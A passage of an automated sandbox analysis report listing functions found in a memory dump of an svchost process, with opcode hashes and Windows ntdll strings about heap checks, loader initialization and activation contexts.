                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section.$SXS: String hash collision chain offset at %p (= %ld) out of bounds$SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p$SsHd
                                                                    • API String ID: 0-2905229100
                                                                    • Opcode ID: f097438ae089462bc947b22b264dcc1beca7411642244af87ba932376aed7ef9
                                                                    • Instruction ID: 7c681bbdf30739c474523678866e3017e324dded5fcd7366dfb0ed3854c6c7e8
                                                                    • Opcode Fuzzy Hash: f097438ae089462bc947b22b264dcc1beca7411642244af87ba932376aed7ef9
                                                                    • Instruction Fuzzy Hash: 9DD1B171A802199BDF24CF98E8D07EDB7B5FF48328F19A06AE945AB341D7319845CB90
                                                                    Function 02E3A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                    • API String ID: 0-379654539
                                                                    • Opcode ID: 3f92e90386514af08ddc7fb8094cfcd8ed3a6fb3ea4eaeaa9220205d0e8c9b5c
                                                                    • Instruction ID: 48ad3f04e95aa9f15e5477e81f532a03dd8350181c4e8e3035963fd1a054a76c
                                                                    • Opcode Fuzzy Hash: 3f92e90386514af08ddc7fb8094cfcd8ed3a6fb3ea4eaeaa9220205d0e8c9b5c
                                                                    • Instruction Fuzzy Hash: 18C17A75188382DFCB12DF18C448BAAB7E4BF84719F00A96AF9D58B350E734C985CB52
                                                                    Function 02E68402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • LdrpInitializeProcess, xrefs: 02E68422
                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 02E68421
                                                                    • @, xrefs: 02E68591
                                                                    • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 02E6855E
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                    • API String ID: 0-1918872054
                                                                    • Opcode ID: 38adeaf954d68e0fa564811f72716a76b850dae34892930c34d3517b24c16d03
                                                                    • Instruction ID: 7015b2b73cd78deaee45bcbb7802061b9eb9287f0a9a9605ca0bbea8dba141a3
                                                                    • Opcode Fuzzy Hash: 38adeaf954d68e0fa564811f72716a76b850dae34892930c34d3517b24c16d03
                                                                    • Instruction Fuzzy Hash: 3F919E715C8344AFE721DB21C894FBBB7E9EB84788F40A92DFA8496150D734D948CB62
                                                                    Function 02E40C00 Relevance: 5.3, Strings: 4, Instructions: 260COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • HEAP[%wZ]: , xrefs: 02E954D1, 02E95592
                                                                    • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 02E954ED
                                                                    • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 02E955AE
                                                                    • HEAP: , xrefs: 02E954E0, 02E955A1
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                    • API String ID: 0-1657114761
                                                                    • Opcode ID: 660be084e2d075e57df5127eddf263168d7d21ead8a9bb235ce422ccabaee614
                                                                    • Instruction ID: 8ddbd62ec6ba206d6d230a00c707b975dd77aa77d93fd331402796c5c9b5c14d
                                                                    • Opcode Fuzzy Hash: 660be084e2d075e57df5127eddf263168d7d21ead8a9bb235ce422ccabaee614
                                                                    • Instruction Fuzzy Hash: CBA1F270684605DFDB29CF24D440BBAB7F1BF45308F14E539E58A8B682DB31A948CB91
                                                                    Function 02E6273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 02EA21D9, 02EA22B1
                                                                    • SXS: %s() passed the empty activation context, xrefs: 02EA21DE
                                                                    • .Local, xrefs: 02E628D8
                                                                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 02EA22B6
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                    • API String ID: 0-1239276146
                                                                    • Opcode ID: 536fd3e2078166d995e862e7e8828fd29607ae2fbde0c99798f4b38a9434d249
                                                                    • Instruction ID: 5d78a8a777b437c634d7f8fc0409a4c193c113029132535b0c90b821ebf3efcd
                                                                    • Opcode Fuzzy Hash: 536fd3e2078166d995e862e7e8828fd29607ae2fbde0c99798f4b38a9434d249
                                                                    • Instruction Fuzzy Hash: 42A1A3319C0229DBDB24CF54DC88BA9B3B1BF58358F1595E9DE48AB251D730AE80CF90
                                                                    Function 02E64AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 02EA3437
                                                                    • SXS: %s() called with invalid flags 0x%08lx, xrefs: 02EA342A
                                                                    • RtlDeactivateActivationContext, xrefs: 02EA3425, 02EA3432, 02EA3451
                                                                    • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 02EA3456
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                    • API String ID: 0-1245972979
                                                                    • Opcode ID: 89c2d8a606b1eb7ba8921b0bb56171afdccbd2e3600493c978f3ae3b7d80fb63
                                                                    • Instruction ID: 26eda9fe6c2231fffea43766985fd9f78705fef8a127f66817ace2b45a0d222b
                                                                    • Opcode Fuzzy Hash: 89c2d8a606b1eb7ba8921b0bb56171afdccbd2e3600493c978f3ae3b7d80fb63
                                                                    • Instruction Fuzzy Hash: A161F4726C07129BD732CF18C855B7AB3A6EF80B98F54D569F8559F280D730E801CB91
                                                                    Function 02E364AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 02E90FE5
                                                                    • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 02E910AE
                                                                    • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 02E91028
                                                                    • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 02E9106B
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                    • API String ID: 0-1468400865
                                                                    • Opcode ID: 3310db018da1c069525116b9ff279a1ffb7921195d8a3f3ac8f1db952d0f7bc9
                                                                    • Instruction ID: 0bce789eb8344d7b327b1638393239231d135502c9edb1571bc0f8ba7cf05616
                                                                    • Opcode Fuzzy Hash: 3310db018da1c069525116b9ff279a1ffb7921195d8a3f3ac8f1db952d0f7bc9
                                                                    • Instruction Fuzzy Hash: 4471E272984304AFCB21DF24C888B977BADAF44764F40A869FE498B146D734D588CFD2
                                                                    Function 02E5245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • LdrpDynamicShimModule, xrefs: 02E9A998
                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 02E9A9A2
                                                                    • apphelp.dll, xrefs: 02E52462
                                                                    • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 02E9A992
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                    • API String ID: 0-176724104
                                                                    • Opcode ID: c74040b31d0c50a259d6df4c6607b8f0a4e70bf728d00c77e203d6a085b303e4
                                                                    • Instruction ID: dbaf36e1e1f2d904e9dfeb55dfcc640ec61699aef69bea44a9072bf7621b5f60
                                                                    • Opcode Fuzzy Hash: c74040b31d0c50a259d6df4c6607b8f0a4e70bf728d00c77e203d6a085b303e4
                                                                    • Instruction Fuzzy Hash: 57314871EC0204ABDF309F589845FAAB7B5FF81748F26946AFD01AB340C7B09995CB40
                                                                    Function 02E429A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • HEAP[%wZ]: , xrefs: 02E43255
                                                                    • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 02E4327D
                                                                    • HEAP: , xrefs: 02E43264
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                    • API String ID: 0-617086771
                                                                    • Opcode ID: 0d2b0e95af0f36a321a5e1c92bfcea0dfda81170543fddb6b47e44c7cbcd59b2
                                                                    • Instruction ID: ee0d738f0c94d346f33ae3a20ff77b797f11496ccbcc4ac77910450c677d0a1f
                                                                    • Opcode Fuzzy Hash: 0d2b0e95af0f36a321a5e1c92bfcea0dfda81170543fddb6b47e44c7cbcd59b2
                                                                    • Instruction Fuzzy Hash: 1292BD70A442499FDB25CF68D4447AEBBF1FF48308F28D099E85AAB391DB34A945CF50
                                                                    Function 02EC02C0 Relevance: 4.4, Strings: 3, Instructions: 611COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: """"$MitigationAuditOptions$MitigationOptions
                                                                    • API String ID: 0-1670051934
                                                                    • Opcode ID: 39920cad08a3215708866d1a8eab78678f1ec2cc165568ea6b6bf1d61ab2e891
                                                                    • Instruction ID: a4bb79567c13c87e19012b7c989294d3266fb69c61ad7fe0709723c7923c3c62
                                                                    • Opcode Fuzzy Hash: 39920cad08a3215708866d1a8eab78678f1ec2cc165568ea6b6bf1d61ab2e891
                                                                    • Instruction Fuzzy Hash: 0B22C272688741CFD724CFA9C65162AFBE1BBC4318F24D92EE1DA87690D770E506CB41
                                                                    Function 02E40770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                    • API String ID: 0-4253913091
                                                                    • Opcode ID: 0460b84c92446f10a269771432a6bc9fe91c3f9f4744ccbab0daee34f1688aba
                                                                    • Instruction ID: 3c0704dbdbdcaf11d7b9d3398a85e22e482a3b77e4a2d5c8454360d569d6843b
                                                                    • Opcode Fuzzy Hash: 0460b84c92446f10a269771432a6bc9fe91c3f9f4744ccbab0daee34f1688aba
                                                                    • Instruction Fuzzy Hash: 5DF1CE70A80605DFDB29CF68D894BAAB7B5FF45308F14D169E6169B381DB30E981CF90
                                                                    Function 02E31460 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • HEAP[%wZ]: , xrefs: 02E31712
                                                                    • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 02E31728
                                                                    • HEAP: , xrefs: 02E31596
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                    • API String ID: 0-3178619729
                                                                    • Opcode ID: fce547e9119700bce40c19f4815f37027d155fd19f9ef9f206af5bb4c0bfdab5
                                                                    • Instruction ID: 944c60a6ac1de4c23ac8e362122d9faec6cedf6546203361b66fd88fe5f292db
                                                                    • Opcode Fuzzy Hash: fce547e9119700bce40c19f4815f37027d155fd19f9ef9f206af5bb4c0bfdab5
                                                                    • Instruction Fuzzy Hash: C8E1FF70A446459BDB2ACF68C495BBABBF1AF49309F18E46DE4DA8B241D734E840CB50
                                                                    Function 02E56962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $@
                                                                    • API String ID: 0-1077428164
                                                                    • Opcode ID: 46f0327bb8ddc50382edcf38727ad8cbb1daa12347526cdc54d7ee2c362168c5
                                                                    • Instruction ID: 25ff728629fd28a3cbfd20e7c8fdf61fad5d41284d6b47ae7c24157a550722b1
                                                                    • Opcode Fuzzy Hash: 46f0327bb8ddc50382edcf38727ad8cbb1daa12347526cdc54d7ee2c362168c5
                                                                    • Instruction Fuzzy Hash: 31C28E716583519FDB25CF24C880BABBBE5AF88708F14E92EFD8987241D734D845CB62
                                                                    Function 02E2A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: FilterFullPath$UseFilter$\??\
                                                                    • API String ID: 0-2779062949
                                                                    • Opcode ID: 85b3b35d913228d5cba48f4e2a150a7b21b7a5d49edc4662d2dcfe1f4110238b
                                                                    • Instruction ID: 08439e6ba426775b91cdbe6ff7a1e5aee70ffc640925a38926c10096a953f020
                                                                    • Opcode Fuzzy Hash: 85b3b35d913228d5cba48f4e2a150a7b21b7a5d49edc4662d2dcfe1f4110238b
                                                                    • Instruction Fuzzy Hash: 92A18E719806299BDB35EF24CC88BE9B3B5EF05704F10A1EAE90DA7250D7359E85CF60
                                                                    Function 02E50BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • Failed to allocated memory for shimmed module list, xrefs: 02E9A10F
                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 02E9A121
                                                                    • LdrpCheckModule, xrefs: 02E9A117
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                    • API String ID: 0-161242083
                                                                    • Opcode ID: b7361c21c4a2428a1b53899fcc3530c60094a9f5f4d7c75ad9accc9f2b3e88eb
                                                                    • Instruction ID: 7658d00caa226a59ef070a1cb5639b7472222c7a12cd41675e391c5ab56ff067
                                                                    • Opcode Fuzzy Hash: b7361c21c4a2428a1b53899fcc3530c60094a9f5f4d7c75ad9accc9f2b3e88eb
                                                                    • Instruction Fuzzy Hash: BF71DD70A802199FDF28DF68C985BAEB7F5EF49308F159469E802E7340E734A949CB50
                                                                    Function 02E40A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                    • API String ID: 0-1334570610
                                                                    • Opcode ID: 03337540db772aedc517d6a62d9909344fd65f592a1080110bfc95f18621ccdb
                                                                    • Instruction ID: 9f25b6ccbf4facd0ee6c8d4fe973fddd067bad932612b82df858842132a90a32
                                                                    • Opcode Fuzzy Hash: 03337540db772aedc517d6a62d9909344fd65f592a1080110bfc95f18621ccdb
                                                                    • Instruction Fuzzy Hash: F961C070680301DFDB29CF24D450BAABBE1FF45308F14E56AE55A8F295DB70E881CB95
                                                                    Function 02EDDAAC Relevance: 3.9, Strings: 3, Instructions: 163COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • HEAP[%wZ]: , xrefs: 02EDDC12
                                                                    • Heap block at %p modified at %p past requested size of %Ix, xrefs: 02EDDC32
                                                                    • HEAP: , xrefs: 02EDDC1F
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                    • API String ID: 0-3815128232
                                                                    • Opcode ID: 7bd8c222152d13514205db17bbe57bc1248b7ef7e347062c4b47338b714b4284
                                                                    • Instruction ID: 97d05f0b72b0b54bf5228b8f9ef5be92cbe923bbc76dacc8382341d158babe9f
                                                                    • Opcode Fuzzy Hash: 7bd8c222152d13514205db17bbe57bc1248b7ef7e347062c4b47338b714b4284
                                                                    • Instruction Fuzzy Hash: BF5124371801548AE774CA29CC547B2B7E2EF4538CF05E84AE4C2CB281D376E847DB21
                                                                    Function 02E6C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 02EA82E8
                                                                    • LdrpInitializePerUserWindowsDirectory, xrefs: 02EA82DE
                                                                    • Failed to reallocate the system dirs string !, xrefs: 02EA82D7
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                    • API String ID: 0-1783798831
                                                                    • Opcode ID: 3f89f706289a284b97277436464211ba5b844e3f299c627f0b42cfa6fb91bb25
                                                                    • Instruction ID: d9fd1692b5a584e3bfcbf9366f6be835e6bf7a753335833912920a08a22d582f
                                                                    • Opcode Fuzzy Hash: 3f89f706289a284b97277436464211ba5b844e3f299c627f0b42cfa6fb91bb25
                                                                    • Instruction Fuzzy Hash: 3E4114719C0314ABD720EB34D848B6BB7E9AF45794F11A82AF989C7290E770E814CF91
                                                                    Function 02EEC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • @, xrefs: 02EEC1F1
                                                                    • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 02EEC1C5
                                                                    • PreferredUILanguages, xrefs: 02EEC212
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                    • API String ID: 0-2968386058
                                                                    • Opcode ID: c18fddab690ab3ce4910e3ce898b16294d64835a82712488daa8092ac05264e7
                                                                    • Instruction ID: db681a7075d523cceee3ec65cb417330e4383610543d3b3c403bd9c4faf87c82
                                                                    • Opcode Fuzzy Hash: c18fddab690ab3ce4910e3ce898b16294d64835a82712488daa8092ac05264e7
                                                                    • Instruction Fuzzy Hash: F2416571D80619EBDF11DBD4C851FEEB7BDAB18B04F14A06BEA06B7280D7749A44CB50
                                                                    Function 02EC4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                    • API String ID: 0-1373925480
                                                                    • Opcode ID: a624eb8ff66f8fe388f367eccde98db7809e19497c99712a845fade5ec9b1df3
                                                                    • Instruction ID: 92c185e7bf4eb83bc3a2c231f9b03f78fb5339b474406696a4c061569df6d820
                                                                    • Opcode Fuzzy Hash: a624eb8ff66f8fe388f367eccde98db7809e19497c99712a845fade5ec9b1df3
                                                                    • Instruction Fuzzy Hash: 904103719802588BEB26DBD4CA54BEDB7B5EF55348F24945DE845FB7C0DB348902CB20
                                                                    Function 02EB4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • LdrpCheckRedirection, xrefs: 02EB488F
                                                                    • minkernel\ntdll\ldrredirect.c, xrefs: 02EB4899
                                                                    • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 02EB4888
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                    • API String ID: 0-3154609507
                                                                    • Opcode ID: f9a3ae718f5b468c4db145f94cc74e45e212c2bfbc5be0dcb7844e249251620d
                                                                    • Instruction ID: 48961218cae7b9d9889482e1a65b5e425a0cc24650064e4796e28660b71f3d71
                                                                    • Opcode Fuzzy Hash: f9a3ae718f5b468c4db145f94cc74e45e212c2bfbc5be0dcb7844e249251620d
                                                                    • Instruction Fuzzy Hash: D1411732A802A49FCF22CE18D860AA7B7E4EF49758F059559FC49D7392D730E800CB81
                                                                    Function 02E40BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                    • API String ID: 0-2558761708
                                                                    • Opcode ID: 85699e409bc2a111764a5a6fff2f24d730f9159b3c32a58bd8414b0ea05f043d
                                                                    • Instruction ID: 43f01d8eb157cd1bce0860e4783b2702cc1068ba79c073bc3dd309132ba02516
                                                                    • Opcode Fuzzy Hash: 85699e409bc2a111764a5a6fff2f24d730f9159b3c32a58bd8414b0ea05f043d
                                                                    • Instruction Fuzzy Hash: D9110F303D51008FEB6DCB14D4A0BB6B3A5EF42719F54E02AE507EB250EB30D844CB54
                                                                    Function 02EB20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • Process initialization failed with status 0x%08lx, xrefs: 02EB20F3
                                                                    • LdrpInitializationFailure, xrefs: 02EB20FA
                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 02EB2104
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                    • API String ID: 0-2986994758
                                                                    • Opcode ID: aac0e9da0d2cea70815afc250d8824ef4edb0b33b90a97a3bbe6fc7fd565d1b3
                                                                    • Instruction ID: fc545f3c1f59c2b193b718cea464f0440aeed5026fb0fd6888c2edaa739ef8a8
                                                                    • Opcode Fuzzy Hash: aac0e9da0d2cea70815afc250d8824ef4edb0b33b90a97a3bbe6fc7fd565d1b3
                                                                    • Instruction Fuzzy Hash: 01F02270AC020CABEB24E60CDC43FDA7768EF41B48F009464FB017B680D2B0A954CAA0
                                                                    Function 02E403E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: ___swprintf_l
                                                                    • String ID: #%u
                                                                    • API String ID: 48624451-232158463
